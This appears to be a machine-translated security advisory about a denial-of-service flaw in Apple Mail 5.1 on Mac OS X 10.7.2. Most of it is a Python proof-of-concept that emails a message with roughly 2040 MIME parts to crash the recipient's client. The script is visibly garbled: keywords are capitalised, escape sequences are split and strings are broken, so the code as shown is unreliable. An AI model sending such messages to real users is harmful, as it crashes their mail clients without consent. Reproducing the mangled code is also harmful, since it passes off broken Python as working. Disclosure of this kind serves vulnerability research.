Release date: 2011-11-01
Updated on: 2011-11-01
Affected Systems:
Apple Mac OS X 10.7.2
Apple Mail 5.1
Description:
--------------------------------------------------------------------------------
Mail. app is a self-contained email program in Apple's Mac OS X operating system.
The Mail. app email client has a denial of service vulnerability in implementation. By sending attachments larger than 2023 MIME to the Mail client, the client may crash during parsing.
<* Source: shebang42
Link: http://seclists.org/bugtraq/2011/Oct/214
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Shebang42 () provides the following test methods:
#! /Usr/bin/env python
# Mail of death for Apple's Mail. app
#
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested! = Vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42
Import smtplib
N_attach = 2040 #~ 2024 is sufficient
Relay = 'ur. mta. goes. here'
Mailfrom = 'mail _ of_death () example com'
Mailto = mailfrom
Subject = 'poc Apple Mail. app mail of death'
Date = 'October 29,201 1 10:00:00 gmt'
Def craft_mail ():
Header = 'from: % s \ nTo: % s \ nSubject: % s \ nDate: % s \ nContent-Type: multipart/mixed; boundary = "delim" \ n \ n' %
(Mailfrom, mailto, subject, date)
Body = '-- delim \ nContent-Type: text/plain \ nContent-Disposition: inline \ n \ nHello World \ nBye Mail. app \ n \ N'
Attach = '-- delim \ nContent-Disposition: inline \ n \ n' * n_attach
### Another, slightly longer option to crash Mail. app (same bug)
# Attach = '-- delim \ nContent-Type: text/plain \ nContent-Disposition: attachment;
Filename = AAAAAAAA \ n \ ncontent \ n' * n_attach
Return header + body + attach
Def send_mail (mail ):
Server = smtplib. SMTP (relay)
Server. sendmail (mailfrom, mailto, mail)
Server. quit ()
Mail = craft_mail ()
# Print mail
Send_mail (mail)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apple
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://support.apple.com/